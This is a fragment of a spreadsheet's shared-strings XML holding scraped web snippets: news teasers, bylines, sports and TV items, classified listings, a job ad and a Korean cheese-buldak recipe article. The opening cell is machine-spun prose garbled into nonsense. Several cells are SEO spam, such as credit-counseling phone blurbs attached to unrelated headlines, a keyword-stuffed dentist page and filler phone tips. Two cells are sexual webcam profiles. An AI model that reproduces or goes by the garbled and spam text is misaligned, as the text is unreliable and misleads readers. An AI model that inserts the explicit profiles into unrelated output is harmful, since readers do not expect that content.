indistinct, I keep rushing dwelling, always experiencing like there may be something So i’m missing. My partner and i keep strolling down the very rainbow steps – and also what I think will be the rainbow actions, this air changing almost everything, making the colorings strange, more or less like I am just layering mind onto property. So when I keep rushing your home, the streets are just continuously filled with lights, with the moves of vehicles and their water lights flooding the freeways with deluges of light, and even the houses are less and less distinctive now, diminishing into the printer ink of afternoon. Only the condo, my home still feels solid, mainly my actions on the hardwood of the hall. Nevertheless I clear the door, all those things greets everyone is mister system.</t>
  </si>
  <si>
    <t>Sian Johnson, Amy Bainbridge And Loretta Florance</t>
  </si>
  <si>
    <t>School principal Michelle Wilson spent a stressful two hours on the phone, convinced she owed $8,000 and could soon be arrested if she didn't pay up. Then she realised the whole thing was an elaborate hoax.</t>
  </si>
  <si>
    <t>Pierra Willix</t>
  </si>
  <si>
    <t>A Baldivis woman who made false dental claims and defrauded HBF out of more than $45,000 has narrowly avoided being sent to jail.</t>
  </si>
  <si>
    <t>Canada’s largest P&amp;C insurer has been taken by surprise by the number of old Ontario auto claims in which accident victims are trying to get benefits for catastrophic impairment. Ontario changed its catastrophic impairment definition for accidents occurring on or… The post How old Ontario auto cat claims affect Intact’s bottom line appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>Marnie Banger</t>
  </si>
  <si>
    <t>Insurance contracts will be held to the same standards as other standard contracts under new draft laws, in line with a banking royal commission finding.</t>
  </si>
  <si>
    <t>In the latest episode of “The Standard is the Standard” show, we break down all the news you need to know surrounding the Black-and-Gold from the week that was. The Pittsburgh Steelers 2019 season is just starting, and the news is really starting to heat up. With a surge of Steelers news, it was time to get back on the airwaves and discuss the Black-and-gold. Take a look at the rundown for the latest episode of the BTSC flagship podcast The Standard is the Standard. On this show Jeff Hartman and special co-host Lance Williams break down all things Steelers! Check out the rundown of the show: News and Notes Updates on Training Camp Players reporting to camp in style? Steelers Q&amp;A and MUCH MORE! Jeff Hartman, editor of BTSC, and Lance Williams walk you through everything you need to know regarding the Black-and-gold. If you haven’t heard, we have a YouTube channel, and the main reason for this is to increase the sound quality on our shows. But if you’re a visual learner you can watch the show below. Be sure to subscribe to our channel! If you missed the live show, be sure to check out all episodes on the following platforms: Apple Users: CLICK HERE Spotify: CLICK HERE Google Play: CLICK HERE If you’re old-school and just want the audio, you can listen to it in the player below.</t>
  </si>
  <si>
    <t>Italy has picked the consulting firm Deloitte as it financial adviser in setting up a 500 million-euro real estate fund in an effort to squeeze money out of the property it owns, an official told Reuters on Friday.</t>
  </si>
  <si>
    <t>robbie613</t>
  </si>
  <si>
    <t>Sony A7 III Mirrorless Camera (Body Only) $2,250.80 Delivered This is a great full-frame camera at a great price. Obviously they have just released the A7R IV so they are dropping existing model prices, but if you were close to pulling the trigger, now's the time. Sony A7R III Mirrorless Camera (Body Only) $3,301.40 (with $300 eftpos card) Delivered This is an awesome full-frame camera at a great price. Obviously they have just released the A7R IV so they are dropping existing model prices, but if you were close to pulling the trigger, now's the time. Claim EFTPOS card DigiDirect have selected Sony camera stock discounted at 15% - link</t>
  </si>
  <si>
    <t>106gti.co.uk</t>
  </si>
  <si>
    <t>1998 Peugeot 106 GTI Gold/yellow Non sunroof modelMOT 11th March 2020HPI clear Very clean and tidy example, although the car is 21 years old and is high mileage the car has been very well looked after. It’s been within my family for over 10 years and has a few very minor age related marks as you would expect. No rust, it’s had some welding done under the ECU which is a common area but everything else original. Wheels have been recently refurbished back to original look. Following modifications have been done while keeping it looking original as possible:CamsStraight through exhaust (another brand new set of CAT &amp; Back box included to pass mot / road use)Upgraded larger disks all round while keeping original size wheels.Strut brace Lot’s of recipes included recently spent over £500 on new brake lines and other bits.Includes original spare wheelAfter market alarm fitted.Tyres in good condition.Subwoofer included.Private reg not includedViewing from ST5 area Not in a rush to sell so please no silly offers. This car is available from eBay UK, the price at time of listing was £3995.00,but may have already sold, please check eBay for further details</t>
  </si>
  <si>
    <t>National Geographic premieres Gordon Ramsay: Unchartered produced by Studio Ramsay in early August in which the outspoken chef showcases world cultures through food and adventure. “It has been an amazing journey travelling off the beaten path with National Geographic and connecting with locals to learn and share incredible stories of unique traditions, delicacies and the extreme lengths it takes to harvest native ingredients,” said Ramsay. “I have learned way more filming this series than I have in the last 10 years.” Eight additional episodes will screen in mid-2020. From Peru, Laos and Morocco to Hawaii, Alaska and New Zealand, Ramsay will be roaring through valleys, diving into oceans, hiking through forests and scaling mountains in his relentless pursuit of culinary inspiration. Food and adventure programming is familiar ground for Ramsay, whose 2010 UK series for Channel 4, “Gordon’s Great Escapes,” saw the venerable chef explore the food culture of India and Southeast Asia. Gordon Ramsay: Uncharted follows Ramsay as he meets with indigenous people around the globe to learn about the cultures, dishes and flavours unique to each location. Every ingredient he harvests and dish he tastes will inspire a new recipe from scratch, created to represent the heart of that culture. Each episode concludes with Ramsay challenging himself with a local food legend by his side — putting his newfound skills to the test as they cook a feast together for the natives. For Ramsay, food is the gateway to culture, and every adventure is a portal into the soul of the people and place. The adventures — culinary and otherwise — that Ramsay takes in the premiere season include: • Trekking through a dense jungle in Laos to sample weaver ant eggs and diving through dangerous waters on the hunt for snails and giant water bugs; • Hunting for eels with his bare hands using traditional Maori techniques with a local fisherman by his side in New Zealand; • Working with local foragers to harvest Maui’s deadliest catch with homemade tools and spearfishing with legendary free diver Kimi Werner in Hawaii; • Climbing a sheer rock face during a snowstorm with a local forager to harvest native herbs in Alaska; • Rappelling down a raging waterfall to meet with local mushroom hunters in Morocco; • Hanging off a cliff in pursuit of cactus worms — a delicacy in Peru. The series will also air globally in 172 countries and 43 languages. Gordon Ramsay: Uncharted is produced by Studio Ramsay. Additional episodes of the series have already been ordered ahead of the premiere, with production set to resume later this year. Gordon Ramsay: Uncharted – Peru’s Sacred Valley Monday August 5 at 8.30pm AEST Chef Gordon Ramsay travels by motorbike through Peru’s Sacred Valley of the Incas to discover traditional high-altitude cuisine. Immersing himself in local culture, he scales cliffs; fishes in high- altitude lakes; and samples local delicacies like fried worms, rare multicoloured potatoes and guinea pig before putting his newfound skills to the test with legendary local chef Virgilio Martinez. Gordon Ramsay: Uncharted – New Zealand’s Rugged South Monday August 12 at 8.30pm AEST Chef Gordon Ramsay journeys to the remote corners of southern New Zealand to unlock the secrets of traditional Maori cuisine. From the locals, he learns how to catch eels with his bare hands, free dives for prized Paua shellfish and forages for unique Kiwi ingredients before putting his new skills to the test at a Maori feast with up-and-coming chef Monique Fiso. Gordon Ramsay: Uncharted – The Mountains of Morocco Monday August 19 at 8.30pm AEST Chef Gordon Ramsay travels to Morocco, North Africa, where he embarks on an adventure deep in the Middle Atlas Mountains to understand ancient Berber cuisine. Learning from the locals, he rappels over a waterfall to meet mushroom hunters, milks a camel and experiences the life of the Berber people. He puts his new skills to the test, cooking a feast with chef Najat Kaanache to celebrate Berber New Year. Gordon Ramsay: Uncharted – Hawaii’s Hana Coast Monday August 26 at 8.30pm AEST Chef Gordon Ramsay travels to Maui, Hawaii, to explore the exotic ingredients of Hawaiian cuisine. In torrential rain, he travels along the treacherous Hana Highway. From the locals, he learns how to hunt deer with a bow, produce Hawaiian taro and spearfish with legendary free diver Kimi Werner. Gordon tests his knowledge at a feast with top Hawaiian chef Sheldon Simeon. Gordon Ramsay: Uncharted – The Mighty Mekong of Laos Monday September 2 at 8.30pm AEST Chef Gordon Ramsay travels to Laos, where he takes on a rapid stretch of white water, kayaking down the Mekong in search of culinary inspiration. Learning from the locals, he treks through dense jungle to sample eggs of the aggressive weaver ant, dives for freshwater snails and hunts for giant water bugs. Using his newly acquired skills, he cooks a banquet for monks at the local temple. Gordon Ramsay: Uncharted – Alaska’s Panhandle Monday September 9 at 8.30pm AEST Chef Gordon Ramsay journeys to the rugged Alaskan Panhandle to learn survival skills and discover Alaskan cuisine. On his adventure, he learns how to cook seal with a native Tlingit elder, climbs a sheer rock face in a snowstorm and goes grouse hunting before putting his newfound knowledge to the test at a feast with legendary local chef Lionel Uddipa. Gordon Ramsay: Uncharted is produced by Studio Ramsay for National Geographic. For Studio Ramsay, executive producers are Gordon Ramsay, Elvia Van Es Olivia, Helen Cooke, Lisa Edwards and Jon Kroll. For National Geographic, executive producer is Betsy Forhan, vice president of production is Kevin Tao Mohs, and president of original programming and production is Geoff Daniels. 8.30pm Monday August 5 on National Geographic.</t>
  </si>
  <si>
    <t>Scott Bailey</t>
  </si>
  <si>
    <t>By Scott Bailey © 2015 One is a mother – caring and fierce Two is wife with perceptions that pierce Three is a woman Kind and strong Four is a friend to help me along Five is the lover tender and sweet All are in one perfect – petite One beautiful and loving wife The five with whom I will spend my life Photo by Scott Bailey The post Circle Of Five appeared first on Scott Andrew Bailey.</t>
  </si>
  <si>
    <t>Police said they located "several" people at the scene, but no one with any obvious injuries.</t>
  </si>
  <si>
    <t>Madeleine Heffernan</t>
  </si>
  <si>
    <t>There are all sorts of schools that seek to bring together the best of single-sex and co-education.</t>
  </si>
  <si>
    <t>Source: https://www.wired.com/story/the-terrible-anxiety-of-location-sharing-apps The Terrible Anxiety of Location Sharing Apps Google Maps, Find My Friends, and other such apps promise peace of mind. Instead, monitoring our loved ones becomes a nail-biting exercise in anxiety. Source: https://www.wired.com/story/the-terrible-anxiety-of-location-sharing-apps The post The Terrible Anxiety of Location Sharing Apps appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>With Calum, George and Graeme away, it was either let Tom rant to himself in a cupboard for half an hour or draft in some support.</t>
  </si>
  <si>
    <t>London Hop-On Hop-Off Bus and London Eye Ticket (London) The post London Hop-On Hop-Off Bus and London Eye Ticket (London) appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>Israeli troops, accompanied by bulldozers, began demolishing homes in the Palestinian village of Sur Baher on Monday. Residents of the village’s Wadi al-Hummus neighbourhood told local media that 16 residential buildings, which hold about 100 apartments, were targeted. The Israeli military considers the homes, which are close to an Israeli separation wall that crisscrosses the occupied West Bank, a security risk. The Israeli Supreme Court ended a seven-year legal battle when it ruled in favour of the military last month, and set Monday as the deadline to knock down the homes. Palestinians say the move sets a precedent for other towns along the route of the barrier, which runs for hundreds of kilometres around and through the occupied West Bank. Palestinians accuse Israel of using “security” as a pretext to force them out of the area as part of long-term efforts to expand illegal settlements. All settlements on occupied Palestinian lands are illegal under international law. The European Union issued a statement saying: “The continuation of this policy undermines the viability of the two-state solution and the prospect for a lasting peace.” Gilad Erdan, Israel’s internal security minister, accused the EU of buying into “the lies of the Palestinians”. Source link</t>
  </si>
  <si>
    <t>Source: http://feeds.maketecheasier.com/~r/MakeTechEasier/~3/SGJ0P_HsLH0/ Facebook Messenger Kids Allowed Users to Chat with Unapproved Users In many ways being a parent is more difficult. We now have to find a way to protect our children not just when they’re apart from us but also when they’re on the Internet. Stranger danger is around our children at all times of the day. Finding safe apps for our children to use on the computer or their devices can be difficult. Finding out what we thought was a safe app is anything but is even worse. Facebook’s Messenger Kids app should be something we can trust. However, just like the adult versions of the Facebook apps,… Read more Source: http://feeds.maketecheasier.com/~r/MakeTechEasier/~3/SGJ0P_HsLH0/ The post Facebook Messenger Kids Allowed Users to Chat with Unapproved Users appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Meghan Markle, Prince Harry, and baby Archie have settled in their home at Frogmore Cottage and it appears that Meghan couldn’t be happier. According to an article published by Us Weekly, Meghan thinks that Kensington Palace is “claustrophobic” and much prefers her more private life in Windsor. “She really likes living in Windsor,” their source said. “It’s much less complicated to have friends visit and feels less claustrophobic than Kensington Palace.” As The Daily Expressreports, Frogmore Cottage has been extensively renovated for the royals and some of that money came from British taxpayers. Approximately £3.2million — about $ 4 million — in public funds was used to outfit the cottage with new flooring, kitchens and bathrooms. Baby Archie reportedly sleeps every night in a £25,000 or $ 31,000 nursery and has a couple of features that you may not find in the average baby’s room like security cameras. Click here to continue and read more… The Inquisitr Meghan Markle Reportedly Thinks That Kensington Palace Is ‘Claustrophobic’</t>
  </si>
  <si>
    <t>Google is cracking down on Chrome extensions that request access to more data than they actually need, and will soon start purging offenders from the Chrome Web Store. In May, Google announced that it would be encouraging developers to think twice about asking for unnecessary information, it's now tightening the rules and making it an explicit requirement that apps "only request access to the least amount of data". The best browsers of 2019: a faster, safer way to get online Your ultimate guide to the best free password managers How to secure your accounts with Dashlane Google is also telling more developers to publish privacy… TechRadar – All the latest technology news The post Google is cracking down on snooping Chrome extensions appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Free daily horoscope for each star sign from renowned Astrologer Kelli Fox. Forecasts for the week ahead in life, love and career.</t>
  </si>
  <si>
    <t>Bill Bainbridge</t>
  </si>
  <si>
    <t>Brisbane man Tony McCracken is on his way home having been rescued after drifting at sea for three days after his boat was damaged in a storm.</t>
  </si>
  <si>
    <t>Brodie Croft has played all the games for the Storm so far this season and he is embracing the emotional rollercoaster of the league.</t>
  </si>
  <si>
    <t>Police say 17-year-old Ayra Nawaz was last seen on Sunday shortly after noon walking from a plaza near Cornell Park and Bur Oak avenues.</t>
  </si>
  <si>
    <t>The New England Patriots drafted back-to-back linebackers a year ago. But Ja’Whaun Bentley and Christian Sam enter their second training camp in far different roster situations. Source: Sports Business News</t>
  </si>
  <si>
    <t>Liberals in the West Australian division of Moore have called for a four-year moratorium on the introduction of voluntary assisted dying legislation.</t>
  </si>
  <si>
    <t>Does anyone not have their own cell phone today? Chances are, just about everybody you know uses a device that does way more than just making phone calls. Read on for helpful suggestions you can incorporate as it pertains to the subject of cell phones. TIP! Restart the phone sometimes to delete unnecessary programs. Doing this about every two or three days will definitely help your phone’s performance. If you drop your cell phone into liquid, do not assume that it is no longer any good and toss it away. The best option is to take out the battery and put it in some uncooked rice. This can absorb some moisture that is inside the phone. TIP! Don’t watch video too much if you have an LTE or 4G signal. There is probably a cap on how much data you can use for the month. You may not need the newest phone the day it hits the market. It’s not always worth the hassle. Companies put out new phones often. Sometimes the updates aren’t even all that noticeable. Look for a few reviews about a new phone prior to buying it so you know whether or not it’s a great idea to update. Most of time, you won’t need to. TIP! Don’t be the first to grab the latest and greatest device. Generally speaking, you won’t get much reward. If you have a cellular telephone and need to get information, you shouldn’t pay for the charges that go with that sort of thing. Instead, call 1-800-411-FREE. You can access the information you’re seeking after an advertisement. TIP! When purchasing a brand new cell phone, be sure to take time and do your research. This will help you to make the right decision. If you have a smart phone, you likely use it constantly. However, you should be sure you shut it off from time to time. This keeps your phone working well. Restarting the phone helps to keep the memory free and operating well. Restarting two or three times per week can make your smartphone perform much better. TIP! Do not have your cell phone around any water. Many people have ruined their phone by dropping it in water. Is your cell phone batter dying quickly? If it does, you might find that your signal is weak. Weak signals can drain the phone’s batteries. Don’t store your phone in a space where it can’t get a signal, like a closet or drawer, when it’s not in use. TIP! Don’t be afraid to switch cell phone brands. Stay open minded. Keep an eye out for extended warranties. These additional costs are typically just that and nothing more. Cell phones that fail typically do so within the first twelve months, when you should already be covered by the original warranty included in the base price. If you trade in your phone annually, that makes it even less worthwhile. TIP! Ask neighbors and friends for advice prior to purchasing a cell phone. They will have great reviews for you. You see cell phones everywhere you go in modern days. As soon as you leave the house, you see one. This article will teach you all you need to know about these devices. Use the advice presented here to make smart choices. TIP! Try to avoid having your phone battery completely drain before recharging it. These batteries should be recharged with frequency. Most people are interested in learning about voip dellmont , however, they are not always aware of how to do so on their own. Thankfully, you came to the right place to help you get started with the learning process. It is up to you to apply the ideas you have reviewed.</t>
  </si>
  <si>
    <t>Russian told South Korea that an equipment malfunction led its military aircraft into an unintended area on Tuesday, South Korea's Yonhap news agency reported, citing the South Korean presidential office.</t>
  </si>
  <si>
    <t>They won’t say, but we know why the government is repurposing other funds for drought relief or emergency responses, or why it won’t increase Newstart.</t>
  </si>
  <si>
    <t>Medicine Hat Dentists at Courtyard Dental Centre are dedicated to family dentistry such as Exams, Teeth Whitening, Veneers and more. We are looking forward to your visit to our Medicine Hat, Alberta dental office. Welcome General and Family. Cosmetic Dentist Near Medicine Hat Alberta Dentist in Medicine Hat Cosmetic Services At River Dental, we can help restore your smile to deliver natural, healthy looking results. Our Medicine Hat, Alberta office serves residents of Medicine Hat, Redcliff, Dunmore, Irvine, Elkwater, Oyen, Bow Island. Looking for the best local places in Medicine Hat, AB? Click Here Children dentists in Medicine Hat Dentist in Medicine Hat Cosmetic Services At River Dental, we can help restore your smile to deliver natural, healthy looking results. Learn More. Highest Rated Dentist Near Medicine Hat Alberta Preferred Dentist Near Medicine Hat Muscle Powered Tuesday Evening Hike, July 23 at Tahoe Rim Trail – Hat and poles recommended. the mural is “Reach for the Stars” and will be placed on a two sided wall near Empire Elementary School on La Loma Drive between Gordonia Drive and Stanton. Preferred Dentist In Medicine Hat Best Dentists in Medicine Hat, AB – Courtyard Dental Centre, Crestwood Dental Clinic, Southside Dental, Sun City Dental, Dr. Brenda Krasko Family Dental, River Dental, Grover Dental Centre, Schow Dental, Galvin Dental, Park Meadows Dental Yelp Find Near. Crestwood Dental Clinic, Medicine Hat, Alberta. 952 likes. We’re a highly diversified group of dentists offering a unique combination of long-term. Crestwood dentists in Medicine Hat provide a range of restorative and cosmetic dental services. We make the dental struggle disappear! Contact us today!. Crestwood Dental – Your Medicine Hat Dentists At Crestwood Dental Clinic, we understand the struggle.</t>
  </si>
  <si>
    <t>The previews are in for next week’s Coronation Street and Gary finds a buyer for Underworld. Sarah...</t>
  </si>
  <si>
    <t>The Billy Kikau verdict has left players questioning what constitutes a shoulder charge and if the crackdown on hitting playmakers late has gone too far.</t>
  </si>
  <si>
    <t>My Kinks: Underwear, kisses, hugs Webcam profile: Why i am here ?same reason as you …to have fun to run from real life and live in the perfect world this places gives us.To explore …learn and try new things .Here the limit is the sky we all are free Favourite sex position: ALL What I do in my amateur show: I adore smart and passionate men, hot whisper in my ear, slight bites and tender kisses… What I don’t like: I try not to get upset when you just ask the same thing over and over again and i use all my patience because i know we can understand each other !! Gallery</t>
  </si>
  <si>
    <t>Simon Johanson</t>
  </si>
  <si>
    <t>A shop leased to Chinese restaurant Elate Kitchen had four bidders at auction and changed hands on a 5.8 per cent yield.</t>
  </si>
  <si>
    <t>July 26, 2019 The Myth of Hebron’s Shuhada Street – Steve Frank Shuhada Street in Hebron in the West Bank, once the thriving market center of the city, was largely shut down for security reasons and in the Palestinian narrative has become a symbol of alleged Israeli apartheid. Visitors are not told of the long history of violence by Arabs against Jews in Hebron which resulted in the closure of the street. They are also not told that the commercial center of Hebron has moved less than a mile from Shuhada Street to Ein Sarah Street and has become a thriving market district, complete with an ultra-modern indoor nine-story mall and American fast-food franchises. It is a place where Jews (not just Israelis, but Jews from any country) are banned. I know because on my recent tour of the area our group was asked whether there were any Jews before we were allowed to continue into the area. While very few visitors are allowed to see more than Shuhada Street, Hebron is the most prosperous city in the PA, with 17,000 factories and workshops, four hospitals, three universities, and an indoor 4,000-seat basketball stadium. The real shame of Shuhada Street is not that a small number of Palestinians are prevented from going there but that the Israeli army is needed to prevent the 85 Jewish families who live nearby from being massacred. The real problem in Hebron from a Palestinian point of view is that it is the only city under Palestinian control that allows even a small number of Jews to reside there. The real apartheid in the West Bank lies with the Palestinians, who insist that any independent Palestinian state be judenrein (Jew-free), in sharp contrast to Israel where two million Arabs reside as full citizens and constitute 20% of the Israeli population. The writer, an attorney, retired after 30 years with the U.S. Department of Justice in Washington. (JNS-Israel Hayom)</t>
  </si>
  <si>
    <t>noHup</t>
  </si>
  <si>
    <t>There are some pretty good deals on Bed Sheet sets, both fitted and flat. There is a lot of choices available, https://www.house.com.au/home/bedroom/sheets-~-sheet-sets?So... Some examples, Following was 99.95$ now 16.98$ https://www.house.com.au/product//park-avenue-cotton-blend-c...</t>
  </si>
  <si>
    <t>Megan Turcato</t>
  </si>
  <si>
    <t>The city looking to keep pace with the changing times by working to identify four new locations for charging stations.</t>
  </si>
  <si>
    <t>A newlywed woman from Belarus who was swept away by a river in Alaska was trying to reach an abandoned bus made famous by the book and film Into the Wild.</t>
  </si>
  <si>
    <t>As a cauldron of hot air from the Sahara desert moved across the continent, drawn northwards by high pressure, Britain reported its hottest weather for the month of July.</t>
  </si>
  <si>
    <t>Sedgwick</t>
  </si>
  <si>
    <t>TORONTO, ON, July 29, 2019 /insPRESS/ – Sedgwick, a leading global provider of technology-enabled risk, benefits and integrated business solutions, announced the expansion of its Canadian operations with the formation of a new business development team led by senior vice… The post Sedgwick drives growth in Canada with addition of business development team appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Travis Scott says he isn't afraid of falling victim to the 'Kardashian Curse' Friday 19 July 2019 11:44 PM UTC-05 http://creditcounselingconsumer.home.blog/mobile-alabama-consumer-credit-counseling-service-888-551-1270/ Travis Scott says he isn’t afraid of falling victim to the ‘Kardashian Curse’: During an interview with GQ Tuesday, the rapper and partner to Kylie Jenner opened up about the “curse,” which was described on “Keeping Up with the Kardashians” as when a partner of the Kardashian clan burns out. During an interview with GQ Tuesday, the rapper and partner to Kylie Jenner opened up about the “curse,” which was described on “Keeping Up with the Kardashians” as when a partner of the Kardashian clan burns out.</t>
  </si>
  <si>
    <t>OUTLANDER fans are looking forward to the upcoming fifth season of the show, but many have been looking back to spy some hidden details they may have missed the first time around – and one may anger some viewers. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Javanese Thai Dictionary – travel dictionary to translate Javanese to Thai. Click on the list to show Javanese or Thai synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Javanese Thai Dictionary →</t>
  </si>
  <si>
    <t>My Kinks: role play, strip, foot fetish, lingerie Webcam profile: I consider myself a sweet and lovely woman, I like to have friends and I love to take the time to look more deeply into each one. I’m eager to hear all of your fantasies and dreams. Let’s get to know each other better! Favourite sex position: on the top, oral, doggy What I do in my amateur show: Male attention. I really love it when men just come staring at me. What I don’t like: Rudeness Gallery</t>
  </si>
  <si>
    <t>Via The Hill: Joe Biden’s lead atop the Democratic primary field in early voting states has narrowed, according to a CBS poll released Sunday. The former vice president enjoys a 5 point lead over his closest competitor, with 25 percent of likely Democratic voters in states holding their primaries before or on Super Tuesday saying […]</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Lava creeps onto geothermal plant site on Hawaii's Big Island Wednesday 31 July 2019 03:48 PM UTC-05 | Tags: credit-counseling https://firmadeabogadosmedellin.blogspot.com/p/parma-ohio-consumer-credit-counseling.html Molten lava from the erupting Kilauea Volcano on Hawaii’s Big Island crept onto a geothermal power plant site on Monday, as workers rushed to shut down the facility to prevent the uncontrollable release of toxic gases. Tags: credit-counseling</t>
  </si>
  <si>
    <t>This week congratulations go to Helen who was the only person to guess that last...</t>
  </si>
  <si>
    <t>Rebecca Turner</t>
  </si>
  <si>
    <t>A woman accused of stealing almost $140,000 from her Alzheimer's-affected mother spent thousands of dollars on event tickets, dinners at Crown and jewellery, but her lawyer tells a Perth court charges against the woman ignore the realities of a complex family situation.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Unarmed man beaten by US police Friday 19 July 2019 11:30 PM UTC-05 http://creditcounselingconsumer.home.blog/davie-florida-consumer-credit-counseling-service-888-551-1270/ Police in Arizona release surveillance video showing officers brutally beating an unarmed man.</t>
  </si>
  <si>
    <t>Although sentiment is fickle and tricky to measure, it can have real-world economic impacts.</t>
  </si>
  <si>
    <t>LOVE ISLAND prepared fans to say goodbye to another couple on Friday, July 26 just days ahead of the ITV2 series final. So who has left Love Island tonight and which couple were dumped? Daily Express :: TV and Radio Feed Love Island: Who left Love Island tonight? Who was dumped?</t>
  </si>
  <si>
    <t>Hello, I am offering personal training services across the GTA. I offer flexible training according to your schedule. In person or remotely. I specialize in: – Health &amp; Nutrition – Kinesiology – Weight Training – Dieting I will personalize a plan according to your schedule, and meet your goals and needs. Contact me today for .. Read more</t>
  </si>
  <si>
    <t>● Follow our Drum &amp; Bass Playlist: http://ukf.io/DNBPlaylist ● Download/Stream: https://pilot.lnk.to/BriRevisited We revisit Fox Stevenson's Bruises a year on from release with two fresh remixes from Curbi &amp; Macky Gee! Macky Gee Like → https://www.facebook.com/macky.gee.3/ Follow → https://twitter.com/mackygee Listen → https://soundcloud.com/mackygee Instagram → https://www.instagram.com/mackygeeofficial/ Visit → http://www.mackygee.com/ Fox Stevenson Like → https://www.facebook.com/FoxStevensonMusic Follow → https://twitter.com/FoxStevensonNow […] The post Fox Stevenson – Bruises (Macky Gee Remix) appeared first on Dubster.</t>
  </si>
  <si>
    <t>IN DEMAND Recruitment &amp; Consulting Inc. is currently recruiting for a SENIOR BOOKKEEPER/SUPERVISOR for our Edmonton, AB client. Our client is looking for someone dedicated, willing to take on more within a role and willing to invest the time into a company to make it feel like it’s their own! We aren’t looking for someone who says it is 4:30PM and time to go home, even though there is something important that has to be finished. JOB DESCRIPTION: Must be able to complete year ends Complete data entry and ensure accuracy Fix any and all types of bookkeeping files Work in a supervisory/lead role and accept responsibility Pay attention to detail in all files Work with clients and be able to adapt to different industries, workplace cultures, environments, etc. Respond to emails and phone calls Schedule client meetings Work on multiple projects at once, helping with other areas/tasks when needed Travel around Edmonton to different client sites Be extremely organized QUALIFICATIONS: Technically savvy with experience on accounting programs, such as: QuickBooks Online, Sage 50 Experience supervising a team/other employees Must have a reliable vehicle and driver’s license as this role involves travel around Edmonton Must be highly proficient on a computer Professional Can-do attitude Willing to go above and beyond Confidential and enjoys being involved on all levels with a business Must be extremely organized and motivated Qualified and interested applicants are encouraged to apply today in confidence by sending your resume as a MS Document to: carolynn@indemand.ca. ONLY QUALIFIED CANDIDATES WILL BE CONTACTED</t>
  </si>
  <si>
    <t>The search for missing hiker Jeremy Boyden and his dog Rocky enters its fourth day, as rescue teams focus on searching the large network of alpine huts scattered across Victoria's high country amid worsening weather.</t>
  </si>
  <si>
    <t>I first laid eyes on cheese buldak, a mozzarella-cloaked Korean dish that translates as “fire chicken,” in a 24-hour restaurant off Wilshire Boulevard in Los Angeles. It was very late at night, and a couple in a window table were pulling long strings of melting cheese off a sizzling platter that beneath its glistening white blanket revealed a steaming pile of bright red chicken drenched in a thick, fragrant sauce. The couple appeared to be in a kind of happy daze, eating silently, mopping their brows, checking the social media feeds on their phones and then returning to the cheese, the chicken, an occasional bite of rice. My ox-bone soup, light and restorative, seemed flat by comparison. I became bored by it, and clomped off into the darkness. I’d made a mistake in ordering and was filled with regret. Now I cook buldak all the time, using an adaptation of a recipe that owes its deepest debt to Emily Kim, the Korean web star known as Maangchi. Her video recipe for cheese buldak has been viewed on YouTube more than seven million times and, thanks to subtitling by her fans, can be read in 24 languages. There are thousands and thousands of comments below it, mostly positive. One reads, “Can you be my mom.” [Read more about Maangchi.] Cheese has not, historically, played much of a role in Korean cuisine. With the exception of the processed American cheese that could be found across the peninsula in the wake of the Korean War, Koreans barely ate cheese until recently. It was expensive and rare. In 1970, researchers say, South Koreans consumed roughly five grams of milk and dairy products a year, per capita. (That’s about the weight of a nickel.) Then came, among other things, chain pizza. Pizza Hut opened in Seoul in the mid-1980s, with Domino’s and Mr. Pizza following soon after, flooding the nation with franchises. By 1990, per capita yearly milk and dairy consumption in South Korea was up to 50 grams. By 2018 it was 2.5 kilograms, or roughly 5.5 pounds. (Americans consume roughly 37 pounds of cheese a year, per capita.) The same cheap, low-moisture mozzarella that tops a delivery pizza is what covers cheese buldak too. Its bland, rubbery sweetness helps temper the spiciness of the dish, which is built on a foundation of chicken set in a sauce of immense heat. The primary ingredients are gochujang, the Korean red-pepper sauce, and gochugaru, dried red peppers that are processed into something that is not quite ground, not quite flaked. Hooni Kim, the chef who owns and operates two beloved Korean restaurants in Manhattan and who is finishing work on his first cookbook, “My Korea: Traditional Flavors, Modern Recipes,” recalled his first time eating cheese buldak, 16 years ago, during a visit to South Korea to meet his future wife’s parents. “It was extremely painful,” he told me in an email, “but so, so good.” Kim told me melting cheese on top of the dish has an additional benefit, at least for Korean restaurateurs: It makes the dish appear a little more Western, he said, like a kind of spice-laden chicken Parm, which means it can be sold at a premium. Here in the West, it is almost comically simple to prepare the dish, just as long as you can find the gochujang and the gochugaru — which of course you can, if only on the internet. The rest is heating and melting. You make a marinade that will become the sauce, soak the chicken in it, then cook them both on the stovetop in a pan, finishing the dish by strewing cheese across the top and running the whole thing beneath a broiler. Earlier in the summer, I drove out to Montauk, at the tip of Long Island in New York, to cook buldak with Maangchi and to thank her for her recipe. I was a little nervous because I’d changed some ingredients and steps. I use chicken thighs instead of the breasts Maangchi calls for, because I prefer them. I also generally omit the cylindrical rice cakes she adds to the pan for reasons of texture. (They’re hard to find!) And sometimes I grill the chicken instead of sautéing it, then put it into a pan and cover with cheese to melt just as you’d do with a cheeseburger. Maangchi was on vacation, staying in a beachside condominium with her husband. She accepted my hacks with relaxed good humor. She made a few of her own that day. Their unit’s kitchen had neither a grill nor an oven, she said, so she would make the dish on a stovetop from start to finish, using the lid of her pan to melt the cheese. This took maybe 30 minutes, contained precisely no surprises and tasted exactly as delicious as it has every time I’ve eaten it. Which makes it an ideal dish, I think, to introduce to people who say they don’t know how to cook. “Exactly,” Maangchi said, laughing. “They can cook this!” Recipe: Maangchi’s Cheese Buldak (Fire Chicken) Source link</t>
  </si>
  <si>
